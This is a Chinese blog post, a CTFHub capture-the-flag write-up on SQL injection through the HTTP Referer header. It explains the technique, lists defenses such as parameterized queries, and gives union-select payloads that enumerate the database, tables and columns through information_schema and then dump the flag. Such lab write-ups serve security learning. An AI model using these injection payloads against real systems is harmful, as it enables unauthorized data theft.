CTFHub - Refer注入

最新推荐文章于 2024-10-18 20:49:14 发布
最新推荐文章于 2024-10-18 20:49:14 发布
阅读量795 收藏 3
点赞数 3
分类专栏: CTFHub 文章标签: 网络安全 web安全 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/have_a_great_day/article/details/132794759
版权

目录

1. Refer注入原理

2. 防御

3. 注入流程

3.1 初始界面

3.2 判断注入方式、类型

3.3 判断回显位置

3.4 获取数据库 库名称

3.5 获取数据表 表名称

3.6 获取列名

3.7 获取数据

1. Refer注入原理

  1. Refer注入是一种利用HTTP头字段中的Referer(引荐者)信息来进行攻击的注入技术。Referer字段通常用于告诉服务器请求的来源,即用户是通过哪个页面或链接访问当前页面的。
  2. Refer注入攻击的原理是通过篡改Referer字段中的值,将恶意的SQL代码插入到应用程序的数据库查询中,从而执行非授权的操作或获取未经授权的数据。攻击者可以通过修改发送给服务器的HTTP请求的Referer字段,将恶意的SQL代码作为Referer值注入进去。

2. 防御

  1. 对于从Referer字段中提取的数据,始终进行充分的验证和过滤。
  2. 确保服务器端的输入验证和过滤逻辑能够正确处理所有的HTTP请求头字段。
  3. 使用参数化查询或预编译语句,而不是将用户提供的数据直接拼接到SQL查询中。
  4. 最小化数据库用户的权限,确保数据库用户只能执行必要的操作。
  5. 在应用程序中实施访问控制和身份验证,限制用户对敏感数据和操作的访问。

3. 注入流程

3.1 初始界面

        一开始通过bp 抓到的数据包是没有Refer字段的。如下图。

        Referer字段通常用于告诉服务器请求的来源,即用户是通过哪个页面或链接访问当前页面的。       

        通俗的讲:需要向页面发送一个请求后,才会带上Reder字段。如下:第一二张图

3.2 判断注入方式、类型

        referer:1        页面存在回显,可以使用联合查询。

        referer:1'        页面不存在回显。

        referer:1 and 1=1        所以是True and True,结果还是True,页面存在回显。

        referer:1 and 1=2        所以是 True and False,结果还是False,页面不存在回显。可判断此处是数字型注入。

3.3 判断回显位置

        select 语句有几列那么需要输入几列。

        Sqli 中有两列,所以输入1和2,判断数字的回显位置。

3.4 获取数据库 库名称

        此处把第1列换成了version()版本号,2换成了database() 数据库名称

-1 union select version(),database()

3.5 获取数据表 表名称

        group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。

        information_schema:关系型数据库中,包括 MySQL、PostgreSQL等,存在一个系统数据库叫做 "information_schema",它存储了关于数据库中元数据(metadata)的信息。

        information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。

        table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。

-1 union select version(),group_concat(table_name)from information_schema.tables where table_schema=database()

3.6 获取列名

         table_name='vbqllcwzws' :选择表名为【vbqllcwzws】的表的数据。

-1 union select version(),group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='vbqllcwzws'

3.7 获取数据

-1 union select version(),ogkscutppt from vbqllcwzws

懒羊羊安全
关注
专栏目录
CTFhub Refer注入
plant1234的博客
06-18 1401
Refer注入: 这道题首先我自己一开始也有点乱,找不到referer在哪里 但根据大佬的博客:https://blog.csdn.net/qq_37450949/article/details/117003065 提示的话知道,referer的一些知识: HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 这句话的意思就是,只有当你向浏
CTFHUB-web-SQL注入
ookami6497的博客
11-29 866
CTFHUB SQL
CTFHub | Refer注入
尼泊罗河伯的博客
11-26 1938
根据题目显示内容,此题和上一题一致,需要在 Refer 请求头中进行 SQL 注入。那么直接使用 burp suite 抓包工具抓取题目网站的信息,并将抓取到的数据发送给重放器。在 Refer请求中使用 payload 进行测试,发现此题存在 Refer注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 ncdiyxjtck 数据中。
CTFHub-referer注入
m0_51589948的博客
05-19 892
referer注入 根据提示寻找referer,对其进行bp抓包,并发包到repeaterreferer进行注入判断 -1 union select 1,2 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag -1 union select database(),1 查库名 然后查询数据库的表名 -1 union select 1,group select(table_name) feom information_schema.table where table_sche
CTFHUB-Cookie注入
Web学习之路
03-28 242
cookie啊
ctfhub Refer注入
weixin_43326436的博客
06-10 950
1,实验环境 ctfhubsql注入 2.工具 火狐浏览器,火狐浏览器插件hackbar(可以安装,百度。。。) 直接抓包,但是会看到没有我们想要的refer这个字样,我们在hackerbar里面输出需要的参数,id=1,提交时抓包,抓到我们所需要的字样。 3.在bp中refer字段这里进行爆库,输入123 union select (database()),2 # 后点击forward放包步骤接下来一样) 显示出了数据库sqli 继续爆表 123 union select (select group_c
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 843
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1269
CTFHUB-WEB-SQL注入
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7351
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
[CTFhub]CTFhub技能树SQL注入——Refer注入
KKleeeaa的博客
04-05 574
提示:本文章仅限学习参考,切勿用于非法用途。
CTFHUB-WEB-SQL注入-Refer注入
weixin_43486981的博客
08-11 1057
题目: 靶机环境: 使用burp suite 抓包,发现包信息中并没有refer字段。 根据提示,添加referer字段,进行注入 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag
CTFHub-referer注入-wp
z1moq的博客
05-18 308
referer注入 注入点如图 测试出能够注入后使用字符型注入语法即可 sqlmap做法同UA注入 HTTP_REFERER简介 HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 ...
ctfhub技能树—SQL注入referer注入
Naptmn的博客
02-07 1326
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
CTFHUB技能树之SQL——Refer注入
最新发布
weixin_73049307的博客
10-18 650
看样子可能不在数据库中,老样子,改成-1 union select 1,2#但是出错了,换成kali的sqlmap试了试也还是不行,不知道什么原因。得知vjrnfqmoar表和news表。回显错误,说明是整数型注入。得知pnzslmlazg列。直接挑明是Refer注入。回显错误,说明字段数是2。得知数据库名是sqli。
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Refer注入
Static______的博客
04-09 1428
HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)也就是说,只有当你向浏览器发送请求时,才会带上referer。得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表。-p 指定参数,这里为 -p “id”1,2都显示,有两个回显字段。
Less19 (referer注入)
老司机开代码的博客
08-03 1839
文章目录1. 什么是referer?2. 分析题目3. 手工注入4. SQLmap注入 1. 什么是referer? 简单讲就是当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的。(直接输入网址或者其他页面中的链接点进来的)。 之前写过一篇关于referer的文章,不明白的小伙伴可以点击下方链接看一下。 HTTP请求头中的referer字段 2. 分析题目 这关的思路和Less-8几乎是一样的。首先看一下网站源码: $sql="SELECT users.username, user
CTFHUB——Cookie、User-Agent、Referer注入 writeup
wuuconix's blog
08-29 857
背景 我们一般做sql注入的时候,注入点一般都是一个文本框,然后我们可以通过输入某种特殊的语句来获得数据库中的信息,但是有时候这种注入点可不一定给你一个文本框,而可能在请求包中的其他地方。 接下来我分享一下CTFHUB中的三道题,它们的注入点分别是请求包中的Cookie、User-Agent和Referer。它们只是注入点不同,基于的的注入方式都是最基本的union联合注入。所以它们的payload都十分简单和相似。 在这次做题过程中,我还尝试了强大的sqlmap,成功得到了一些结果。 SQL注入——Coo
SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)
Fighting_hawk的博客
02-21 5079
1. 了解referer的含义与作用; 2. 掌握referer注入的方法。
CTFHUB-SQL注入-refer注入
u014794539的博客
07-10 492
考点 sql refer注入 过程分析 hackbar发送refer 然后发送repeater抓包 GET / HTTP/1.1 Host: challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10800 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值